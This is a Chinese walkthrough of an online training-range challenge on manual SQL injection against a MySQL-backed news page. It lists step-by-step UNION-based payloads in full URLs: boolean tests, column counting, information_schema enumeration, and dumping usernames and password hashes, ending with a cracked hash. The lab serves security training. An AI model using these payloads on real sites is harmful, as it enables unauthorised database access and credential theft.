靶场地址SQL手工注入漏洞测试(MySQL数据库)_SQL注入_在线靶场_墨者学院_专注于网络安全人才培养1、我们先找出注入点
2、测试
1、http://124.70.64.48:40896/new_list.php?id=1' //' 报错 存在注入
2、http://124.70.64.48:40896/new_list.php?id=1%20and%201=1 //and 1=1 不报错
3、http://124.70.64.48:40896/new_list.php?id=1%20and%201=2 //and 1=2 报错注入
4、使用order by 查询 1-4可以正常 说明不大于5
http://124.70.64.48:40896/new_list.php?id=1%20order%20by%205
3,5、http://219.153.49.228:48730/new_list.php?id=-1 union select 1,2,3,4
使用联合查询,返回在2和3
6、查询数据库名称和版本http://219.153.49.228:48730/new_list.php?id=-1 union select 1,database(),version(),4
7、http://219.153.49.228:48730/new_list.php?id=-1 union select 1,schema_name,3,4 from information_schema.schemata limit 0,1 后面以次查询1,1、2,1、3,1
查询数据库,使用limit0,1表示从第0行开始取1行数据。
8、查询mozhe_Discuz_StormGroup的数据库的表的名字,从第0行取一行数据http://219.153.49.228:48730/new_list.php?id=-1 union select 1,table_name,3,4 from information_schema.tables where table_schema=‘mozhe_Discuz_StormGroup’ limit 0,1 后面以次查询1,1、2,1、3,1
9、http://219.153.49.228:48730/new_list.php?id=-1 union select 1,column_name,column_type,4 from information_schema.columns where table_name=‘StormGroup_member’ limit 0,1
查询StormGroup_member的表的字段内容,从第0行取一行数据10、http://219.153.49.228:48730/new_list.php?id=-1 union select 1,concat(name,’-’,password,’-’,status),3,4 from mozhe_Discuz_StormGroup.StormGroup_member limit 0,1
11,http://219.153.49.228:48730/new_list.php?id=-1 union select 1,concat(name,’-’,password,’-’,status),3,4 from mozhe_Discuz_StormGroup.StormGroup_member limit 1,1
cmd5s破解得到密码 3c93fe1975bee70c8156f5b0a6fa776f
欢迎分享,转载请注明来源:内存溢出
评论列表(0条)